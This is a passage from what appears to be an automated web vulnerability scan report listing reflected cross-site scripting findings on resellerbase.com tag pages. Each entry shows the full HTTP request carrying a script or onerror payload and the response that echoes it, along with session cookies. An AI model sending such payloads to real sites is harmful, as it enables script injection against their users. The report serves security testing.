<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf3e77<script>alert(1)</script>3d4c24d8d5bcf2ce0/TGP?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4172. http://www.resellerbase.com/tag/TGP [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/TGP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d025d</title><img%20src%3da%20onerror%3dalert(1)>de94b852156 was submitted in the REST URL parameter 2. This input was echoed as d025d</title><img src=a onerror=alert(1)>de94b852156 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/TGPd025d</title><img%20src%3da%20onerror%3dalert(1)>de94b852156 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: TGPd025d</title><img src=a onerror=alert(1)>de94b852156</title>
...[SNIP]...

2.4173. http://www.resellerbase.com/tag/TGP [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/TGP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1172f<img%20src%3da%20onerror%3dalert(1)>f1578696b0c was submitted in the REST URL parameter 2. This input was echoed as 1172f<img src=a onerror=alert(1)>f1578696b0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/TGP1172f<img%20src%3da%20onerror%3dalert(1)>f1578696b0c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: TGP11
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : TGP1172f<img src=a onerror=alert(1)>f1578696b0c]</td>
...[SNIP]...

2.4174. http://www.resellerbase.com/tag/TGP [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/TGP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52ccf<img%20src%3da%20onerror%3dalert(1)>a251217cc91dcac22 was submitted in the REST URL parameter 2. This input was echoed as 52ccf<img src=a onerror=alert(1)>a251217cc91dcac22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/TGP52ccf<img%20src%3da%20onerror%3dalert(1)>a251217cc91dcac22?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/TGP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: TGP52
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : TGP52ccf<img src=a onerror=alert(1)>a251217cc91dcac22]</td>
...[SNIP]...

2.4175. http://www.resellerbase.com/tag/TGP [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/TGP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload aae35</title><img%20src%3da%20onerror%3dalert(1)>e8feb48c5cae2bf0b was submitted in the REST URL parameter 2. This input was echoed as aae35</title><img src=a onerror=alert(1)>e8feb48c5cae2bf0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/TGPaae35</title><img%20src%3da%20onerror%3dalert(1)>e8feb48c5cae2bf0b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/TGP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: TGPaae35</title><img src=a onerror=alert(1)>e8feb48c5cae2bf0b</title>
...[SNIP]...

2.4176. http://www.resellerbase.com/tag/VOIP [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/VOIP

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4af70<script>alert(1)</script>bfd27bbc562 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag4af70<script>alert(1)</script>bfd27bbc562/VOIP HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4af70<script>alert(1)</script>bfd27bbc562/VOIP was not found on this server.</p>
...[SNIP]...

2.4177. http://www.resellerbase.com/tag/VOIP [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/VOIP

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 806b2<script>alert(1)</script>73f2806784dce2daa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag806b2<script>alert(1)</script>73f2806784dce2daa/VOIP?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/VOIP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag806b2<script>alert(1)</script>73f2806784dce2daa/VOIP?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4178. http://www.resellerbase.com/tag/VOIP [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/VOIP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload dd45a</title><img%20src%3da%20onerror%3dalert(1)>2472ebc6bb6d0045e was submitted in the REST URL parameter 2. This input was echoed as dd45a</title><img src=a onerror=alert(1)>2472ebc6bb6d0045e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/VOIPdd45a</title><img%20src%3da%20onerror%3dalert(1)>2472ebc6bb6d0045e?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/VOIP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: VOIPdd45a</title><img src=a onerror=alert(1)>2472ebc6bb6d0045e</title>
...[SNIP]...

2.4179. http://www.resellerbase.com/tag/VOIP [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/VOIP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8a79<img%20src%3da%20onerror%3dalert(1)>4b26ee6a93f934250 was submitted in the REST URL parameter 2. This input was echoed as a8a79<img src=a onerror=alert(1)>4b26ee6a93f934250 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/VOIPa8a79<img%20src%3da%20onerror%3dalert(1)>4b26ee6a93f934250?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/VOIP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: VOIPa
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : VOIPa8a79<img src=a onerror=alert(1)>4b26ee6a93f934250]</td>
...[SNIP]...

2.4180. http://www.resellerbase.com/tag/VOIP [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/VOIP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c55d2<img%20src%3da%20onerror%3dalert(1)>f97aac702d9 was submitted in the REST URL parameter 2. This input was echoed as c55d2<img src=a onerror=alert(1)>f97aac702d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/VOIPc55d2<img%20src%3da%20onerror%3dalert(1)>f97aac702d9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: VOIPc
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : VOIPc55d2<img src=a onerror=alert(1)>f97aac702d9]</td>
...[SNIP]...

2.4181. http://www.resellerbase.com/tag/VOIP [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/VOIP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e13b2</title><img%20src%3da%20onerror%3dalert(1)>22d57472512 was submitted in the REST URL parameter 2. This input was echoed as e13b2</title><img src=a onerror=alert(1)>22d57472512 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/VOIPe13b2</title><img%20src%3da%20onerror%3dalert(1)>22d57472512 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: VOIPe13b2</title><img src=a onerror=alert(1)>22d57472512</title>
...[SNIP]...

2.4182. http://www.resellerbase.com/tag/White+Label+SEO [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/White+Label+SEO

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2368e<script>alert(1)</script>640b569220e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag2368e<script>alert(1)</script>640b569220e/White+Label+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2368e<script>alert(1)</script>640b569220e/White+Label+SEO was not found on this server.</p>
...[SNIP]...

2.4183. http://www.resellerbase.com/tag/adult [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ba47"><script>alert(1)</script>ec78fa98f58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /tag5ba47"><script>alert(1)</script>ec78fa98f58/adult HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/tag5ba47"><script>alert(1)</script>ec78fa98f58/adult/more2.html" style="color: ">
...[SNIP]...

2.4184. http://www.resellerbase.com/tag/adult [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16dd4"><script>alert(1)</script>01e2cc30b82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag16dd4"><script>alert(1)</script>01e2cc30b82/adult HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/tag16dd4"><script>alert(1)</script>01e2cc30b82/adult/more2.html" style="color: ">
...[SNIP]...

2.4185. http://www.resellerbase.com/tag/adult [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2a038</title><img%20src%3da%20onerror%3dalert(1)>ffde05f86a5221597 was submitted in the REST URL parameter 2. This input was echoed as 2a038</title><img src=a onerror=alert(1)>ffde05f86a5221597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/adult2a038</title><img%20src%3da%20onerror%3dalert(1)>ffde05f86a5221597?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult2a038</title><img src=a onerror=alert(1)>ffde05f86a5221597</title>
...[SNIP]...

2.4186. http://www.resellerbase.com/tag/adult [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 570d7<img%20src%3da%20onerror%3dalert(1)>ee7adbba298c42c1b was submitted in the REST URL parameter 2. This input was echoed as 570d7<img src=a onerror=alert(1)>ee7adbba298c42c1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/adult570d7<img%20src%3da%20onerror%3dalert(1)>ee7adbba298c42c1b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : adult570d7<img src=a onerror=alert(1)>ee7adbba298c42c1b]</td>
...[SNIP]...

2.4187. http://www.resellerbase.com/tag/adult [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bae97<img%20src%3da%20onerror%3dalert(1)>e6a4efb0062 was submitted in the REST URL parameter 2. This input was echoed as bae97<img src=a onerror=alert(1)>e6a4efb0062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/adultbae97<img%20src%3da%20onerror%3dalert(1)>e6a4efb0062 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : adultbae97<img src=a onerror=alert(1)>e6a4efb0062]</td>
...[SNIP]...

2.4188. http://www.resellerbase.com/tag/adult [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/adult

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload c2c75</title><img%20src%3da%20onerror%3dalert(1)>178e0613c93 was submitted in the REST URL parameter 2. This input was echoed as c2c75</title><img src=a onerror=alert(1)>178e0613c93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/adultc2c75</title><img%20src%3da%20onerror%3dalert(1)>178e0613c93 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
